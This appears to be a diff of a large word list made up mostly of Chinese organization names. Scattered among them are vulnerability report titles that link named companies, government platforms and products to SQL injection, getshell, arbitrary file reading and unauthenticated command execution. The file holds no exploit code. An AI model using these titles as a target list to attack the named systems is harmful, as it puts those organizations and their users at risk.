安徽新华传媒股份有限公司 +安徽新华发行控股有限公司 安徽朝华互联科技有限公司 安徽梦舟实业股份有限公司 安徽水利开发股份有限公司 @@ -31474,8 +31508,10 @@ zstu 安徽电子信息职业技术学院 安徽皖仪科技股份有限公司 安徽皖南电机股份有限公司 +安徽皖江物流股份有限公司 安徽皖通科技股份有限公司 安徽皖金泵阀制造有限公司 +安徽盛运环保股份有限公司 安徽省人民政府信息公开网 安徽省人民政府法制办公室 安徽省六安市舒城县农业局 @@ -31508,6 +31544,8 @@ zstu 安心财产保险有限责任公司 安正时尚集团股份有限公司 安源煤业集团股份有限公司 +安瑞维尔信息技术有限公司 +安科生物工程股份有限公司 安诚财产保险股份有限公司 安邦保险集团股份有限公司 安阳市社会保险事业管理局 @@ -31540,7 +31578,6 @@ zstu 富德财产保险股份有限公司 射洪县电子政务外网办公室 尚友教育信息咨询有限公司 -尚娱软件(深圳)有限公司 山东东宏管业股份有限公司 山东东阿阿胶股份有限公司 山东中烟工业有限责任公司 @@ -31564,6 +31601,7 @@ zstu 山东卡特重工机械有限公司 山东双一科技股份有限公司 山东圣阳电源股份有限公司 +山东大学第二医院在线咨询 山东大学自考综合服务平台 山东大胜化工集团有限公司 山东天业恒基股份有限公司 @@ -31677,7 +31715,6 @@ zstu 峰硕家居电子商务有限公司 崇义章源钨业股份有限公司 川北幼儿师范高等专科学校 -川耐阀门(上海)有限公司 工业和信息化部中小企业局 工银瑞信基金管理有限公司 巨人网络集团股份有限公司 @@ -31969,8 +32006,8 @@ zstu 广西百色市平果县人民政府 广西绿城水务股份有限公司 广西金融投资集团有限公司 -库币(成都)科技有限公司 庞大汽贸集团股份有限公司 +康泰医学系统股份有限公司 康铭光电科技有限公司官网 廊坊市住房公积金管理中心 廊坊市食品药品监督管理局 @@ -31981,14 +32018,12 @@ zstu 延边州安全生产监督管理局 建信保险资产管理有限公司 建新矿业股份有限责任公司 -开封橡胶(集团)有限公司 开普互联信息科技有限公司 开滦能源化工股份有限公司 弘康人寿保险股份有限公司 张家港华泰旅行社有限公司 当代东方投资股份有限公司 彩虹显示器件股份有限公司 -彪马(上海)商贸有限公司 徐州市丰县政府信息公开网 徐州市住房公积金管理中心 徐州梦创信息科技有限公司 @@ -31996,13 +32031,14 @@ zstu 徐州蓝佳网络科技有限公司 徐州财经高等职业技术学校 徐工集团工程机械有限公司 -微虎软件(北京)有限公司 +微贷金融信息服务有限公司 德华安顾人寿保险有限公司 德奥通用航空股份有限公司 德州人力资源和社会保障局 德州汽车总站网上售票网站 忠旺集团人力资源管理系统 快克智能装备股份有限公司 +快快金融信息服务有限公司 快钱支付信息服务有限公司 怀集登云汽配股份有限公司 思创医惠科技股份有限公司 @@ -32016,7 +32052,6 @@ zstu 恒锋信息科技股份有限公司 悦康药业集团制药总厂网站 悦康药业集团股份有限公司 -悦昌(上海)电器有限公司 惠州亿纬锂能股份有限公司 惠州光弘科技股份有限公司 惠州市以及辖区内信访系统 @@ -32079,6 +32114,7 @@ zstu 成都市食品药品监督管理局 成都康乔电子有限责任公司 成都建工路桥建设有限公司 +成都彩虹电器股份有限公司 成都悠唐网络科技有限公司 成都悦游互动科技有限公司 成都感触网络科技有限公司 @@ -32173,6 +32209,7 @@ zstu 拓维信息系统股份有限公司 振德医疗用品股份有限公司 掌上书城存在越权漏洞漏洞 +掌合天下信息技术有限公司 控客智能插座远程控制漏洞 控客智能门锁远程控制漏洞 揭阳市纪委、市监察局网站 @@ -32206,7 +32243,6 @@ zstu 新疆合金投资股份有限公司 新疆国统管道股份有限公司 新疆国际实业股份有限公司 -新疆天业(集团)有限公司 新疆天富能源股份有限公司 新疆天山水泥股份有限公司 新疆天润乳业股份有限公司 @@ -32219,8 +32255,8 @@ zstu 新疆西部牧业股份有限公司 新疆金风科技股份有限公司 新疆锦龙电力有限责任公司 +新疆雪峰科技股份有限公司 新蔡县住房公积金管理中心 -新蛋科技(成都)有限公司 新闻出版总署教育培训中心 新闻媒体系统两处注入合集 方大特钢科技股份有限公司 @@ -32240,7 +32276,6 @@ zstu 无锡盈达聚力科技有限公司 无锡航亚科技股份有限公司 无锡隆盛科技股份有限公司 -日产(中国)投资有限公司 日出东方控股股份有限公司 日升天信科技股份有限公司 日播时尚集团股份有限公司 @@ -32248,7 +32283,6 @@ zstu 日海智能科技股份有限公司 日照市政府外事侨务办公室 日照钢铁控股集团有限公司 -日立电梯(中国)有限公司 时代出版传媒股份有限公司 旷达科技集团股份有限公司 昆仑健康保险股份有限公司 @@ -32262,14 +32296,14 @@ zstu 昆明华美美莱整形美容医院 昆明市安全生产监督管理局 昆明市网翼通科技有限公司 +昆明百货大楼股份有限公司 昆明龙津药业股份有限公司 昇辉智能科技股份有限公司 -明纬(广州)电子有限公司 +昊翔电能运动科技有限公司 +明治制果食品工业有限公司 明阳智慧能源集团股份公司 易安财产保险股份有限公司 -易家科技(大连)有限公司 星辉互动娱乐股份有限公司 -春云(北京)科技有限公司 昭通市住房公积金管理中心 晋商消费金融股份有限公司 晋城市安全生产监督管理局 @@ -32371,7 +32405,6 @@ zstu 杭州雄迈信息技术有限公司 杭州集智机电股份有限公司 杭州顺网科技股份有限公司 -松冈科技(浙江)有限公司 松德智慧装备股份有限公司 林业和草原局科技发展中心 林州重机集团股份有限公司 @@ -32379,7 +32412,6 @@ zstu 枣庄市安全生产监督管理局 枣庄市文化广电新闻出版局 枣庄石榴网络科技有限公司 -柏莼(天津)商贸有限公司 柳州工贸大厦股份有限公司 株洲冶炼集团股份有限公司 株洲千金药业股份有限公司 @@ -32399,14 +32431,11 @@ zstu 森霸传感科技股份有限公司 横店集团东磁股份有限公司 欢瑞世纪联合股份有限公司 -欧尚(中国)投资有限公司 欧普康视科技股份有限公司 欧派家居集团股份有限公司 -正大(中国)投资有限公司 正奇安徽金融控股有限公司 正好网络科技湖北有限公司 正平路桥建设股份有限公司 -正新橡胶(中国)有限公司 武大吉奥信息技术有限公司 武汉东湖风景区管理委员会 武汉中商集团股份有限公司 @@ -32444,7 +32473,6 @@ zstu 武汉船舶职业技术学院网站 武汉莱博信息技术有限公司 武汉金运激光股份有限公司 -武汉钢铁(集团)有限公司 武汉高德红外股份有限公司 武进横山桥镇社区教育中心 比音勒芬服饰股份有限公司 @@ -32767,12 +32795,12 @@ zstu 泸州市人民政府法制办公室 泸州市城市管理行政执法局 泸州老窖集团有限责任公司 +泽达易盛科技股份有限公司 洛阳启辰网络技术有限公司 洛阳市人民政府外事办公室 洛阳市安全生产监督管理局 洛阳市工业和信息化委员会 洛阳轴研科技股份有限公司 -活跃网络(成都)有限公司 济南中维世纪科技有限公司 济南亚宁广告传媒有限公司 济南产权交易中心有限公司 @@ -32971,6 +32999,7 @@ zstu 海信科龙电器股份有限公司 海信网络科技股份有限公司 海信视像科技股份有限公司 +海克斯康测量技术有限公司 海南中和药业股份有限公司 海南京粮控股股份有限公司 海南农业学校海南科技学校 @@ -33065,6 +33094,7 @@ zstu 深圳市天亿通通信有限公司 深圳市安全生产监督管理局 深圳市安奈儿股份有限公司 +深圳市康达尔股份有限公司 深圳市捷佳伟创新能源装备 深圳市斯凯荣科技有限公司 深圳市斯帕克电气有限公司 @@ -33088,6 +33118,7 @@ zstu 深圳市金大福珠宝有限公司 深圳市金泉网资讯有限公司 深圳市雅诗阁商贸有限公司 +深圳市飞亚达股份有限公司 深圳市鼎泰富科技有限公司 深圳广田集团股份有限公司 深圳快地欧凯科技有限公司 @@ -33286,7 +33317,6 @@ zstu 熊猫乳品集团股份有限公司 燕赵财产保险股份有限公司 爱丽家居科技股份有限公司 -爱思集团(中国)有限公司 爱普香料集团股份有限公司 爱林至善贸易股份有限公司 爱茉莉太平洋贸易有限公司 @@ -33317,10 +33347,12 @@ zstu 珠海赛隆药业股份有限公司 珠海金山办公软件有限公司 珠海高远电能科技有限公司 -瑞幸咖啡(北京)有限公司 瑞康医药集团股份有限公司 瑞鹄汽车模具股份有限公司 甘肃上峰水泥股份有限公司 +甘肃亚盛实业股份有限公司 +甘肃刚泰控股股份有限公司 +甘肃国芳工贸股份有限公司 甘肃大禹节水股份有限公司 甘肃成兴信息科技有限公司 甘肃有色冶金职业技术学院 @@ -33329,10 +33361,12 @@ zstu 甘肃省庆阳市环县人民政府 甘肃省陇南市文县人民政府 甘肃省食品药品监督管理局 +甘肃荣华实业股份有限公司 甘肃靖远煤电股份有限公司 用友网络科技股份有限公司 申万宏源集团股份有限公司 申科滑动轴承股份有限公司 +申联生物医药股份有限公司 电光防爆科技股份有限公司 电子科技大学格拉斯哥学院 男人袜电商平台服务器权限 @@ -33354,7 +33388,6 @@ zstu 盛和资源控股股份有限公司 盛屯矿业集团股份有限公司 盛达金属资源股份有限公司 -盟拓软件(苏州)有限公司 睿康文远电缆股份有限公司 睿智医药科技股份有限公司 石嘴山高新技术产业开发区 @@ -33366,7 +33399,6 @@ zstu 社会力量参与救灾信息平台 神华铁路装备有限责任公司 神州数码集团股份有限公司 -神州数码(中国)有限公司 神州高铁技术股份有限公司 神思电子技术股份有限公司 神通科技集团股份有限公司 @@ -33414,6 +33446,7 @@ zstu 福建鸿博印刷股份有限公司 福建龙净环保股份有限公司 福建龙洲运输股份有限公司 +福建龙溪轴承股份有限公司 福达合金材料股份有限公司 科兴生物制药股份有限公司 科大国创软件股份有限公司 @@ -33458,6 +33491,7 @@ zstu 美盛文化创意股份有限公司 翡翠教育科技集团有限公司 老百姓大药房连锁有限公司 +者尼文化传媒有限责任公司 聊城市东昌府区人大常委会 聊城市经济和信息化委员会 聊城经济技术开发区人才网 @@ -33487,6 +33521,7 @@ zstu 花王生态工程股份有限公司 苏宁易购集团股份有限公司 苏州世名科技股份有限公司 +苏州创元投资发展有限公司 苏州华源控股股份有限公司 苏州博仲升新材料有限公司 苏州固锝电子股份有限公司 @@ -33593,7 +33628,6 @@ zstu 西安陕鼓动力股份有限公司 西安音乐学院网络信息中心 西安龙之旅秦风国际旅行社 -西普(福州)传媒有限公司 西湖区教育信息与装备中心 西藏华钰矿业股份有限公司 西藏奇正藏药股份有限公司 @@ -33602,17 +33636,17 @@ zstu 西藏自治区日喀则市公安局 西藏高争民爆股份有限公司 西部金属材料股份有限公司 +视觉文化发展股份有限公司 许昌伯乐职业介绍有限公司 许昌市安全生产监督管理局 许昌玖毅网络科技有限公司 -论客科技(广州)有限公司 诚泰财产保险股份有限公司 诚邦生态环境股份有限公司 诺力智能装备股份有限公司 -诺心食品(上海)有限公司 读者出版传媒股份有限公司 谱尼测试集团股份有限公司 谷歌大叔外贸推广营销论坛 +豆神教育科技股份有限公司 财通证券资产管理有限公司 贵州三力制药股份有限公司 贵州人力资源和社会保障局 @@ -33662,16 +33696,14 @@ zstu 达州市人民政府办公室网站 达州市人民政府法制办公室 达州市食品药品监督管理局 -达飞轮船(中国)有限公司 迁安市安全生产监督管理局 迈克生物科技股份有限公司 迈普通信技术股份有限公司 运城市住房公积金管理中心 运城市食品药品监督管理局 +运盛医疗科技股份有限公司 远东智慧能源股份有限公司 远丰电商商城系统逻辑漏洞 -远光软件(北京)有限公司 -远光软件(武汉)有限公司 远大产业控股股份有限公司 连云港住房公积金管理中心 连云港市教育管理信息中心 @@ -33705,6 +33737,7 @@ zstu 郑州科技学院信息工程学院 郑州索特信息技术有限公司 郑州紫田网络科技有限公司 +郑州航空港经济综合实验区 郑州诺云网络科技有限公司 郑州轻工业学院招生信息网 都邦财产保险股份有限公司 @@ -33718,6 +33751,7 @@ zstu 重庆三峡油漆股份有限公司 重庆三峡银行股份有限公司 重庆丹鸣网络科技有限公司 +重庆交通运输控股有限公司 重庆人力资源和社会保障网 重庆六业科技发展有限公司 重庆再升科技股份有限公司 @@ -33730,6 +33764,7 @@ zstu 重庆天极畅娱网络有限公司 重庆天畅远业科技有限公司 重庆天非室内设计有限公司 +重庆太极实业股份有限公司 重庆将音速记服务有限公司 重庆尚唯信息技术有限公司 重庆工商大学信息化办公室 @@ -33770,6 +33805,7 @@ zstu 重庆长安铃木汽车有限公司 重庆顺戴网络科技有限公司 重庆鸿巨网络科技有限公司 +量子高科生物股份有限公司 金乡科技创新公共服务平台 金元顺安基金管理有限公司 金华华速文化传播有限公司 @@ -33777,7 +33813,6 @@ zstu 金华星秀文化传播有限公司 金华智联信息科技有限公司 金卡智能集团股份有限公司 -金地(集团)股份有限公司 金宇生物技术股份有限公司 金安国纪科技股份有限公司 金河生物科技股份有限公司 @@ -33792,13 +33827,11 @@ zstu 钛马信息网络技术有限公司 钱江水利开发股份有限公司 钱江电气集团股份有限公司 -铁三角(大中华)有限公司 铜仁市人力资源社会保障局 铜陵市食品药品监督管理局 银川城市快讯广告有限公司 银川天脉网络科技有限公司 银都餐饮设备股份有限公司 -锋镝传媒(深圳)有限公司 锦州吉翔钼业股份有限公司 锦州市人民政府法制办公室 锦州市安全生产监督管理局 @@ -33854,7 +33887,7 @@ zstu 阳江市以及辖区内信访系统 阳泉市安全生产监督管理局 阳泉市食品药品监督管理局 -陆军军医大学(第三军医) +阿里斯顿热能产品有限公司 陕县教育资源公共服务平台 陕州教育资源公共服务平台 陕西公众软件有限责任公司 @@ -33885,11 +33918,10 @@ zstu 陕西陕煤陕北矿业有限公司 陕西黑猫焦化股份有限公司 陵水黎族自治县提蒙乡政府 +隆华科技集团股份有限公司 隆基绿能科技股份有限公司 隆鑫通用动力股份有限公司 随州市经济和信息化委员会 -雅培贸易(上海)有限公司 -雅昌文化(集团)有限公司 雏鹰农牧集团股份有限公司 雪天盐业集团股份有限公司 雲林縣四湖鄉飛沙國民小學 @@ -33926,18 +33958,17 @@ zstu 青海人社网上办事服务大厅 青海华鼎实业股份有限公司 青海盐湖工业股份有限公司 -青牛(北京)技术有限公司 鞍山七彩化学股份有限公司 鞍山森远路桥股份有限公司 韶关市以及辖区内信访系统 顺德市食品药品监督管理局 顺德干部教育培训网络学院 领先未来科技集团有限公司 -颐海(上海)食品有限公司 飞天诚信科技股份有限公司 飞龙汽车部件股份有限公司 食品药品质量安全追溯系统 饶河东北黑蜂集团有限公司 +首华燃气科技股份有限公司 首都精神文明创建申报系统 香港佳迅旅客服务有限公司 香港浸会大学联合国际学院 @@ -33955,6 +33986,7 @@ zstu 鹏欣环球资源股份有限公司 鹏起科技发展股份有限公司 鹤壁市人力资源和社会保障 +麦克奥迪电气股份有限公司 黄冈市房地产管理局政务网 黄山人力资源和社会保障局 黄山市人力资源和社会保障 @@ -33988,27 +34020,11 @@ zstu 龙岩人力资源和社会保障局 龙虎山风景旅游区官方网站 龙虎山风景旅游区系列站点 -山东大学第二医院在线咨询 深圳市益百思科技有限公司 KA-CN海外点卡商城 北京知持动力科技有限公司 存在SQL注入 中华人民共和国环境保护部 卫星环境应用中心 江苏省青少年科技教育中心 江苏省青少年科技创新活动服务平台 -中国嘉陵工业股份有限公司(集团) -上海德必文化创意产业发展(集团)股份有限公司 -中国义乌国际小商品博览会(义博会)官方网站 -宁波启点教育科技有限公司(悟空识字) -宁波有道网络技术有限公司(腾讯企业QQ经销商) -北京市经济和信息化委员会(北京市国防科学技术工业办公室) 深圳中兴网信科技有限公司- -媒体内容管理平台文件读取/目录列表 -媒体采编系统任意文件读取/目录列表 -媒体内容管理平台文件读取/目录列表/SSRF -媒体内容管理平台文件读取/目录列表2 -媒体采编系统任意文件读取/目录列表2 -媒体内容管理平台文件读取/目录列表3 -媒体内容管理平台文件读取/目录列表4 -媒体内容管理平台文件读取/目录列表5 -媒体内容管理平台文件读取/目录列表6 国家质量监督检验检疫总局12365质检官网 新闻媒体系统三处注入合集2 因酷免费开源网校系统前台2处xss&3处越权打包 @@ -34020,12 +34036,12 @@ zstu 海通网络虚拟货币交易平台SQL注入1 海通网络虚拟货币交易平台SQL注入2+任意用户密码修改2 海通网络虚拟货币交易平台SQL注入3+任意用户密码修改 +互联网综合管理平台无限制SQL注入漏洞 和达科技热网无线监测系统SQL注入漏洞 济南白菜网络建站系统存在SQL注入漏洞 互联网综合管理平台无限制SQL注入漏洞2 互联网综合管理平台无限制SQL注入漏洞3 互联网综合管理平台无限制SQL注入漏洞4 -互联网综合管理平台无限制SQL注入漏洞(无限制) 湖北省教育信息化发展中心_1 四川思途智旅软件有限公司cms建站系统存在SQL注入漏洞 龙岩市公安局红土警务抓捕e平台指挥中心 @@ -34033,7 +34049,7 @@ zstu 因酷时代营销官网开源系统getshell 云办公室五处代码执行导致getshell. 上海易睦网络科技有限公司imo云办公室存在命令执行 -广州宏天软件开发平台存在sql注入 (最后四处打包) +广州宏天软件开发平台存在sql注入 海盗云商最新版一处无条件sql注入+逻辑验证缺陷 因酷免费开源网校系统前台sql注入漏洞 济南华科商城系统存在一处sql注入漏洞 @@ -34189,6 +34205,7 @@ zstu 中共焦作市委农村工作办公室 中共达州市通川区委书记信箱 中共鄂托克前旗委员会组织部 +中共重庆市九龙坡区委宣传部 中关村海淀企业综合服务平台 中农发种业集团股份有限公司 中医科学院中医药信息研究所 @@ -34199,6 +34216,7 @@ zstu 中国义乌国际森林产品博览会 中国人寿员保险股份有限公司 中国人民解放军陆军军医大学 +中国共产党云南省委员会党校 中国共产党叶县委员会组织部 中国农工民主党成都市委员会 中国农工民主党洛阳市委员会 @@ -34210,6 +34228,8 @@ zstu 中国国际贸易委员会广西分会 中国地质调查局发展研究中心 中国大唐集团公司云南分公司 +中国大唐集团公司广西分公司 +中国太平洋保险股份有限公司 中国山东省莱州市政府清单网 中国建筑第一工程局有限公司 中国建筑第七工程局有限公司 @@ -34229,6 +34249,7 @@ zstu 中国民主建国会南京市委员会 中国民主建国会山西省委员会 中国民办高等教育学生信息网 +中国民办高等教育招生信息网 中国气象局公共气象服务中心 中国河南国际投资贸易洽谈会 中国特种设备公示信息查询网 @@ -34236,6 +34257,8 @@ zstu 中国石油天然气股份有限公司 中国石油天然气集团有限公司 中国矿业大学国家大学科技园 +中国自由贸易试验区平潭片区 +中国自由贸易试验区开封片区 中国航空发动机集团有限公司 中国葛洲坝集团股份有限公司 中国计算机世界出版服务公司 @@ -34252,13 +34275,14 @@ zstu 中国铁路郑州局集团有限公司 中国音像著作权集体管理协会 中国香料香精化妆品工业协会 -中国(四川)自由贸易试验区 中外运空运发展股份有限公司 中山中国国际旅行社有限公司 中山市光臣照明科技有限公司 中山市网联信息科技有限公司 +中微半导体设备股份有限公司 中惠熙元房地产集团有限公司 中海油能源发展股份有限公司 +中电网电子科技发展有限公司 中盐内蒙古化工股份有限公司 中石化石油机械股份有限公司 中科寒武纪科技股份有限公司 @@ -34266,6 +34290,7 @@ zstu 中航航空高科技股份有限公司 中节能环保装备股份有限公司 中节能风力发电股份有限公司 +中英合作采购专业专业自考网 中远海运集装箱运输有限公司 中铁装配式建筑股份有限公司 中铁西南科学研究院有限公司 @@ -34286,6 +34311,7 @@ zstu 乌兰察布食药局协同管理平台 乌鲁木齐供热行业管理办公室 乐山吉象人造林制品有限公司 +乐视网信息技术股份有限公司 九州通医药集团股份有限公司 二六三网络通信股份有限公司 云南创新新材料股份有限公司 @@ -34308,7 +34334,6 @@ zstu 仙桃市人力资源和社会保障局 任子行网络技术股份有限公司 伊春市九天生物科技有限公司 -优定制科技(北京)有限公司 余杭海外人才资源服务对接网 佛山市云迈电子商务有限公司 佛山市住房和城乡建设管理局 @@ -34325,6 +34350,7 @@ zstu 佳木斯市住房公积金管理中心 侗族自治州三穗县纪委监察局 依米康科技集团股份有限公司 +俏十岁生物科技股份有限公司 保力新能源科技股份有限公司 保定乐凯新材料股份有限公司 保定市专项资金监督管理平台 @@ -34334,6 +34360,7 @@ zstu 信阳市人力资源和社会保障局 信雅达系统工程股份有限公司 健康元药业集团股份有限公司 +元翔国际航空港股份有限公司 光大保德信基金管理有限公司 光明房地产集团股份有限公司 全国教师教育网络联盟秘书处 @@ -34366,6 +34393,7 @@ zstu 内蒙古赤峰市扶贫开发办公室 内蒙古远兴能源股份有限公司 农垦牡丹江管理局信息港网站 +凯莱英医药集团股份有限公司 包头市卫生和计划生育委员会 北京一天天教育科技有限公司 北京一起网科技股份有限公司 @@ -34397,7 +34425,6 @@ zstu 北京味多美食品有限责任公司 北京嗨学网教育科技有限公司 北京国研网信息股份有限公司 -北京大学教育基金会(美国) 北京大学附属中学石景山学校 北京大家网教育科技有限公司 北京奇思客网络科技有限公司 @@ -34501,6 +34528,7 @@ zstu 北部湾财产保险股份有限公司 十堰市人力资源和社会保障局 华南理工大学广州学院图书馆 +华懋新材料科技股份有限公司 华油惠博普科技股份有限公司 华能澜沧江水电股份有限公司 南亚新材料科技股份有限公司 @@ -34552,12 +34580,12 @@ zstu 厦门金达威集团股份有限公司 厦门阿拉喜网络科技有限公司 友乐活北京网络科技有限公司 +发现时空国际旅行社有限公司 句容市人力资源和社会保障局 台州存量房交易信息管理平台 台州市人力资源和社会保障局 台州市银河信息技术有限公司 史丹利农业集团股份有限公司 -合力贷(北京)科技有限公司 合肥市人力资源和社会保障局 合肥设计研究院有限责任公司 吉安市人力资源和社会保障局 @@ -34577,6 +34605,7 @@ zstu 吉林省金冠电气股份有限公司 吉林省长久实业集团有限公司 吉林省领导干部网络培训学苑 +同业云人工智能科技有限公司 同方赛威讯信息技术有限公司 吴起县人民政府政务服务中心 周口市人力资源和社会保障局 @@ -34601,6 +34630,7 @@ zstu 嘉兴市房屋征收信息公开系统 嘉兴斯达半导体股份有限公司 嘉善县人力资源和社会保障局 +嘉必优生物技术股份有限公司 嘉祥县人力资源和社会保障局 四季青服装电子商务有限公司 四川依米康龙控软件有限公司 @@ -34637,12 +34667,14 @@ zstu 四川睿盈源科技有限责任公司 四川美亚联环保技术有限公司 四川迅睿云软件开发有限公司 +四川金宇汽车城股份有限公司 回头客食品集团股份有限公司 固镇县纵横天地信息科技中心 国内领事认证网上填表子系统 国家卫生计生委药具管理中心 国家开放大学出版社有限公司 国家摩托车质量监督检验中心 +国家林业局湿地保护管理中心 国家级地质灾害气象预警预报 国家统计局江苏调查总队网站 国家药品监督管理局宿迁分局 @@ -34658,11 +34690,11 @@ zstu 大庆市人力资源和社会保障局 大恒新纪元科技股份有限公司 大悦城控股集团股份有限公司 -大自然家居(中国)有限公司 大连市人力资源和社会保障局 大连市农副产品价格预警系统 大连康辉国际旅行社有限公司 大连蒂艾斯科技发展有限公司 +天下秀数字科技股份有限公司 天士力医药集团股份有限公司 天奇自动化工程股份有限公司 天水生活网电子商务有限公司 @@ -34687,13 +34719,12 @@ zstu 太原市卫生和计划生育委员会 太原市轨道交通发展有限公司 奇安信科技集团股份有限公司 +好利来电子科技股份有限公司 好想你健康食品股份有限公司 好收益金融信息服务有限公司 如东县人力资源和社会保障局 如皋市人力资源和社会保障局 -威可楷(中国)投资有限公司 威海市人力资源和社会保障局 -威莱(广州)日用品有限公司 娄底市人力资源和社会保障局 孝感市住房保障和房屋管理局 孟津县权责清单信息管理系统 @@ -34753,11 +34784,13 @@ zstu 安徽金种子酒业股份有限公司 安徽鑫科新材料股份有限公司 安徽集友新材料股份有限公司 +安徽鸿路钢结构股份有限公司 安徽黄山市黄山区纪检监察网 安福县海能实业股份有限公司 安费诺电子装配集团有限公司 安阳市人力资源和社会保障局 安阳市政府重点项目管理系统 +安集微电子科技股份有限公司 宜兴市人力资源和社会保障局 宜宾市政府采购电子竞价平台 宜昌市夷陵区劳动就业管理局 @@ -34768,7 +34801,6 @@ zstu 宿迁市杰才网络科技有限公司 密西根大学中国信息研究中心 富奥汽车零部件股份有限公司 -富泰华工业(深圳)有限公司 富满微电子集团股份有限公司 寿光市网上阳光村务监督平台 山东地纬计算机软件有限公司 @@ -34808,7 +34840,6 @@ zstu 山东菏泽市牡丹区政务服务网 山东青州市公共资源交易中心 山东龙大肉食品股份有限公司 -山崎马扎克(中国)有限公司 山西乐村淘网络科技有限公司 山西保利房地产开发有限公司 山西大学图书馆图书交流平台 @@ -34838,6 +34869,7 @@ zstu 常州天晟新材料股份有限公司 常州市凯迪电器股份有限公司 常州市惠众环保科技有限公司 +常州市教育信息公共服务平台 常州市日宏干燥设备有限公司 常州市钟楼区人民政府办公室 常熟市东方红木家俱有限公司 @@ -35105,7 +35137,6 @@ zstu 昆明荣城房地产经纪有限公司 明光市人力资源和社会保障局 明新旭腾新材料股份有限公司 -易图通科技(北京)有限公司 易联众信息技术股份有限公司 易见供应链管理股份有限公司 昭通市人力资源和社会保障局 @@ -35149,6 +35180,7 @@ zstu 枞阳县人力资源和社会保障局 某人才网权限绕过加信息泄露 某政府权责清单信息管理系统 +某硬件系统任意文件下载漏洞 某硬件设备远程命令执行漏洞 柳州市卫生和计划生育委员会 柳州市构利金融服务有限公司 @@ -35261,6 +35293,7 @@ zstu 江西金达莱环保股份有限公司 江门市人力资源和社会保障局 江门市科恒实业股份有限公司 +江门甘蔗化工厂股份有限公司 江阴大澄新媒体发展有限公司 江阴市恒润重工股份有限公司 汪清县人力资源和社会保障局 @@ -35409,6 +35442,7 @@ zstu 淮安市人力资源和社会保障局 淮安市政府网站运行管理中心 深圳世联行集团股份有限公司 +深圳中华自行车股份有限公司 深圳中科软科技项目管理系统 深圳中顺易金融服务有限公司 深圳信立泰药业股份有限公司 @@ -35508,6 +35542,7 @@ zstu 深圳市易尚展示股份有限公司 深圳市易流科技股份有限公司 深圳市景旺电子股份有限公司 +深圳市景田食品饮料有限公司 深圳市智搜信息技术有限公司 深圳市智水小荷技术有限公司 深圳市智莱科技股份有限公司 @@ -35538,6 +35573,7 @@ zstu 深圳市燕麦科技股份有限公司 深圳市爱豆网络技术有限公司 深圳市爱贝信息技术有限公司 +深圳市物业发展股份有限公司 深圳市特发信息股份有限公司 深圳市特发服务股份有限公司 深圳市瑞凌实业股份有限公司 @@ -35686,6 +35722,7 @@ zstu 爱美客技术发展股份有限公司 牡丹江恒丰纸业股份有限公司 牧高笛户外用品股份有限公司 +猛狮新能源科技股份有限公司 玉环市人力资源和社会保障局 玉环市社会保险事业管理中心 珠海九洲港客运服务有限公司 @@ -35714,8 +35751,6 @@ zstu 白城市卫生和计划生育委员会 百奥泰生物制药股份有限公司 百望金赋科技有限公司某分站 -百脑汇(中国)投资有限公司 -盈融达投资(北京)有限公司 益丰大药房连锁股份有限公司 盐城市人力资源和社会保障局 盐城市人力资源和社会保障网 @@ -35755,7 +35790,9 @@ zstu 福建省医院预约诊疗服务平台 福建省卫生和计划生育委员会 福建省宏鼎网络科技有限公司 +福建省永安林业股份有限公司 福建省港英教育科技有限公司 +福建省电子信息有限责任公司 福建省科技厅星火计划办公室 福建省讯网网络科技有限公司 福建省闽发铝业股份有限公司 @@ -35763,13 +35800,12 @@ zstu 福建省马尾造船股份有限公司 福建省高速公路集团有限公司 福清市墨客文化传播有限公司 -福腾宝(上海)商业有限公司 +福立旺精密机电股份有限公司 福莱特玻璃集团股份有限公司 科力尔电机集团股份有限公司 秦皇岛人力资源和社会保障局 章丘区人力资源和社会保障局 签哪儿商务信息咨询有限公司 -米哈游科技(上海)有限公司 紫光国芯微电子股份有限公司 绍兴市人力资源和社会保障局 绍兴市人力资源和社会保障网 @@ -35779,10 +35815,10 @@ zstu 绵阳市工业和信息化服务平台 罗普特科技集团股份有限公司 联泓新材料科技股份有限公司 -自由岛(北京)科技有限公司 自贡市人力资源和社会保障局 自贡市自流井区委员会组织部 臺中市國民教育輔導團入口網 +舒泰神生物制药股份有限公司 舟山市人力资源和社会保障局 舟山市消费者权益保护委员会 舟山机动车驾培公众服务平台 @@ -35828,7 +35864,6 @@ zstu 蚌埠市人力资源和社会保障局 衡水市人力资源和社会保障局 衡阳市人力资源和社会保障局 -衡阳广播电影电视局(中心) 衢州市粮食收储有限责任公司 衢州市衢江区市场监督管理局 襄阳市人力资源和社会保障局 @@ -35836,7 +35871,6 @@ zstu 襄阳市石开网络科技有限公司 西上海汽车服务股份有限公司 西南大学网络与继续教育学院 -西域供应链(上海)有限公司 西安中成卫综合业务管理平台 西安宝德自动化股份有限公司 西安市人力资源和社会保障局 @@ -35869,7 +35903,6 @@ zstu 赛特斯信息科技股份有限公司 赣州壹壹肆网络科技有限公司 赣榆区安置人员信息管理系统 -车主邦(北京)科技有限公司 辽宁盛生堂药房连锁有限公司 辽宁省人力资源和社会保障厅 辽宁省人力资源和社会保障局 @@ -35928,9 +35961,11 @@ zstu 重庆市人力资源和社会保障局 重庆市人民政府驻上海办事处 重庆市住房和城乡建设委员会 +重庆市公共交通控股有限公司 重庆市卫生和计划生育委员会 重庆市国土资源和房屋管理局 重庆市学前教育管理信息系统 +重庆市汽车运输有限责任公司 重庆市沙坪坝区人民代表大会 重庆市职业技能鉴定指导中心 重庆市能源投资集团有限公司 @@ -35963,6 +35998,7 @@ zstu 长春一东离合器股份有限公司 长春榆树市卫生和计划生育局 长春金阳高科技有限责任公司 +长江精工钢结构股份有限公司 长沙二三三网络科技有限公司 长沙国家高新技术产业开发区 长沙市人力资源和社会保障局 @@ -36039,7 +36075,6 @@ zstu 黄山市人力资源和社会保障局 黄河万家寨水利枢纽有限公司 黄石大冶湖高新技术产业园区 -黑牡丹(集团)股份有限公司 黑龙江中小企业网肇州县分网 黑龙江交通发展股份有限公司 黑龙江京蓝科技股份有限公司 @@ -36068,23 +36103,18 @@ zstu 龙利得智能科技股份有限公司 龙岩卓越新能源股份有限公司 龙蟒佰利联集团股份有限公司 -中国民办高等教育招生信息网 -常州市教育信息公共服务平台 -某硬件系统任意文件下载漏洞(无需登录) -中国共产党云南省委员会党校(云南行政学院) -中国大唐集团公司广西分公司(广西桂冠电力股份有限公司) 重庆消防物联网监控管理系统--信息发布子系统 上海市大学生科技创业基金会-全球创业周中国站 乾安县人力资源和社会保障局.政务 -某硬件设备远程命令执行漏洞10(无需登录) -某硬件设备远程命令执行漏洞2(无需登录) -某硬件设备远程命令执行漏洞3(无需登录) 